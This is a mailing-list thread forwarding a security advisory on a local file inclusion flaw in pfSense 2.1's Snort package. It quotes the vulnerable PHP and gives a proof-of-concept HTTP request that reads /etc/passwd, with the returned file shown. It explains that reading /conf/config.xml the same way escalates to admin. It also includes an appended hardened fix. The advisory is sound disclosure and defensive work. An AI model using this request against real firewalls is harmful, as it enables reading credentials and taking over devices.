[FUG-BR] [FYI] pfSense 2.1 Privilege Escalation from less privileged users (LFI/RCE)

2014-01-28 Welkson Renny de Medeiros
Gentlemen, good afternoon!

Alert for anyone using the Snort package on pfSense.

Welkson

...

##
#  _ ___  _   _    _  _
#  | |   / _ \| \ | |/ ___|/ ___|  / \|_   _|
#  | |  | | | |  \| | |  _| | / _ \ | |
#  | |__| |_| | |\  | |_| | |___ / ___ \| |
#  |_\___/|_| \_|\|\/_/   \_\_|
#
# Exploit Title: pfSense 2.1 Privilege Escalation from less privileged users (LFI/RCE)
# Date: 25/01/2014 (0-day)
# Exploit Author: @u0x (Pichaya Morimoto)
# Software Link: www.pfsense.org
# Category: Local File Inclusion (LFI)  Privilege Escalation
# Version: pfSense 2.1 build 20130911-1816 with snort 2.9.5.5 pkg v.3.0.2
#
#



pfSense firewall/router distribution description
================================================

pfSense is a free, open source customized distribution of FreeBSD tailored
for use as a firewall and router. In addition to being a powerful, flexible
firewalling and routing platform, it includes a long list of related
features and a package system allowing further expandability without adding
bloat and potential security vulnerabilities to the base distribution.
pfSense is a popular project with more than 1 million downloads since its
inception, and proven in countless installations ranging from small home
networks protecting a PC and an Xbox to large corporations, universities
and other organizations protecting thousands of network devices.

This project started in 2004 as a fork of the m0n0wall project, but focused
towards full PC installations rather than the embedded hardware focus of
m0n0wall. pfSense also offers an embedded image for Compact Flash based
installations, however it is not our primary focus.

Attack Scenario
===============

Authenticated users who only have permission to access certain packages in the
web GUI (a.k.a. webConfigurator) can escalate themselves to full admin
privileges by reading the /conf/config.xml file through package bugs (e.g. the
Snort LFI), resulting in full compromise of the pfSense installation.

This attack abuses the user privilege scheme together with some of the official
packages (System > Package Manager).

* Session hijacking is also possible: stealing a less privileged user's session
is enough to perform this trick, since the webConfigurator is served over plain
HTTP by default.

Sample bug #1: Snort Admin Privilege Escalation via Local File Inclusion Vulnerability

Vulnerable file
===============

snort_log_view.php

[+] Checksum
SHA1: ec1330e804eb028f2410c8ef9439df103bb2764c
MD5: cd767e46a4e9e09ede7fd26560e37f14

Vulnerable Source Code
======================
http://www.pfsense.com/packages/config/snort/snort_log_view.php
https://github.com/pfsense/pfsense-packages/blob/master/config/snort/snort_log_view.php

...(deducted)...

$contents = '';
// Read the contents of the argument passed to us.
// Is it a fully qualified path and file?

if (file_exists($_GET['logfile']))
   $contents = file_get_contents($_GET['logfile']);
// It is not something we can display, so print an error.
else
   $contents = gettext("\n\nERROR -- File: {$_GET['logfile']} not found!");
$pgtitle = array(gettext("Snort"), gettext("Log File Viewer"));
?>

...(deducted)...
<textarea style="width:100%; height:100%;" readonly wrap="off" rows="33" cols="80" name="code2"><?=$contents;?></textarea>
...(deducted)...



Proof of Concept 1 : Arbitrary File Inclusion
=============================================

GET /snort/snort_log_view.php?logfile=/etc/passwd HTTP/1.1
Host: firewall1.pentestlab1:1337
Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: th,en-US;q=0.8,en;q=0.6
Cookie: PHPSESSID=980de3bdd73f6bc4728b0dca854de258; cookie_test=1390628083

HTTP/1.1 200 OK
Expires: Mon, 27 Jan 2014 07:25:10 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=18
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 25 Jan 2014 05:25:10 GMT
X-Frame-Options: SAMEORIGIN
Pragma: no-cache
Content-type: text/html
Transfer-Encoding: chunked
Date: Sat, 25 Jan 2014 05:25:10 GMT
Server: lighttpd/1.4.32

...(deducted)...
<td colspan="2" valign="top" class="label">
   <div style="background: #ee; width:100%; height:100%;" id="textareaitem"><!-- NOTE: The opening *and* the closing textarea tag must be on the same line. -->
   <textarea style="width:100%; height:100%;" readonly wrap="off" rows="33" cols="80" name="code2">root:*:0:0:Charlie &:/root:/bin/sh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
...(deducted)...
havp:*:1003:2000:havp daemon:/nonexistent:/sbin/nologin
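The root cause above is that snort_log_view.php hands the raw logfile parameter straight to file_exists() and file_get_contents(). The following hardened version is an added example written for this post, not the pfSense project's own fix: it resolves the requested name inside an assumed Snort log directory and refuses anything that does not canonicalize to a regular file below it.

```php
<?php
// Added example (not the pfSense project's patch): hardened replacement for the
// check quoted above. The log directory is an assumption for illustration.
$allowed_dir = '/var/log/snort';

// Return the canonical path of $requested if it is a regular file strictly
// inside $base, otherwise null. Relative subpaths under $base are allowed.
function safe_log_path($base, $requested) {
    // Reject non-strings, empty input and NUL bytes (path truncation tricks).
    if (!is_string($requested) || $requested === '' || strpos($requested, "\0") !== false)
        return null;
    // realpath() resolves "..", symlinks and duplicate slashes, and returns
    // false when the target does not exist. Joining onto $base first means an
    // absolute request such as "/etc/passwd" is looked up under $base, not "/".
    $real_base = realpath($base);
    $real_file = realpath($base . '/' . $requested);
    if ($real_base === false || $real_file === false)
        return null;
    // Prefix check with a trailing slash so "/var/log/snort2" cannot pass.
    $prefix = rtrim($real_base, '/') . '/';
    if (strncmp($real_file, $prefix, strlen($prefix)) !== 0 || !is_file($real_file))
        return null;
    return $real_file;
}

$contents = '';
$path = isset($_GET['logfile']) ? safe_log_path($allowed_dir, $_GET['logfile']) : null;
if ($path !== null)
    $contents = file_get_contents($path);
else
    // Generic error: do not echo the attacker-controlled path back into the page.
    $contents = gettext("\n\nERROR -- Requested log file not found!");
$pgtitle = array(gettext("Snort"), gettext("Log File Viewer"));
?>
<!-- Escape the file contents so log data cannot inject markup into the viewer. -->
<textarea style="width:100%; height:100%;" readonly wrap="off" rows="33" cols="80" name="code2"><?=htmlspecialchars($contents, ENT_QUOTES, 'UTF-8');?></textarea>
```

With this check, logfile=/etc/passwd and logfile=../../../conf/config.xml both resolve outside the allowed directory and are rejected, while a file that really lives under the Snort log directory still displays as before.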

Re: [FUG-BR] [FYI] pfSense 2.1 Privilege Escalation from less privileged users (LFI/RCE)

2014-01-28 firebits
Awesome! (from a vulnerability research point of view)

@firebitsbr


2014-01-28 Welkson Renny de Medeiros welk...@gmail.com